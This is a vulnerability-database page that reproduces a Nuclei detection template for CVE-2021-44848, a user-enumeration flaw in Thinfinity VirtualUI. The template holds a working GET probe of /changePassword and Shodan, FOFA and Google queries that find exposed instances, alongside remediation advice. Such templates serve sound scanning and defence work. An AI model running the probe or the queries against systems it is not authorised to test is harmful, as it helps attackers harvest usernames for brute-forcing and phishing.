| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration Vulnerability | 16 Dec 202100:00 | – | zdt | |
| CVE-2021-44848 | 13 Dec 202102:15 | – | attackerkb | |
| CVE-2021-44848 | 28 Jun 202218:24 | – | circl | |
| Cybele Software Thinfinity VirtualUI授权问题漏洞 | 13 Dec 202100:00 | – | cnnvd | |
| CVE-2021-44848 | 13 Dec 202101:08 | – | cve | |
| CVE-2021-44848 | 13 Dec 202101:08 | – | cvelist | |
| Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration | 16 Dec 202100:00 | – | exploitdb | |
| Thinfinity Iframe Injection | 3 Jul 202613:39 | – | nuclei | |
| CVE-2021-44848 | 13 Dec 202102:15 | – | nvd | |
| CVE-2021-44848 | 13 Dec 202102:15 | – | osv |
id: CVE-2021-44848
info:
name: Thinfinity VirtualUI User Enumeration
author: danielmofer
severity: medium
description: Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.)
impact: |
An attacker can use the gathered usernames for further attacks, such as brute-forcing passwords or launching targeted phishing campaigns.
remediation: |
Apply the vendor-supplied patch or upgrade to the latest version of Thinfinity VirtualUI to mitigate the user enumeration vulnerability.
reference:
- https://github.com/cybelesoft/virtualui/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2021-44848
- https://www.tenable.com/cve/CVE-2021-44848
- http://packetstormsecurity.com/files/165327/Cibele-Thinfinity-VirtualUI-2.5.41.0-User-Enumeration.html
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-44848
cwe-id: CWE-203
epss-score: 0.23141
epss-percentile: 0.97487
cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cybelesoft
product: thinfinity_virtualui
shodan-query: http.title:"thinfinity virtualui"
fofa-query: title="thinfinity virtualui"
google-query: intitle:"thinfinity virtualui"
tags: cve2021,cve,exposure,thinfinity,packetstorm,virtualui,tenable,cybelesoft,vuln
http:
- raw:
- |
GET /changePassword?username=administrator HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '"rc":(.*?)'
- '"msg":"(.*?)"'
condition: and
- type: status
status:
- 200
# digest: 490a0046304402202d08086badb2a809cd98a6d973efc999dbecb0da80494a660b01f0865425a81d022031e51aa9ab9443fc3e67d33f774d4c5cad7b9baec3fe1622e1c9bfc1dd252b63:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation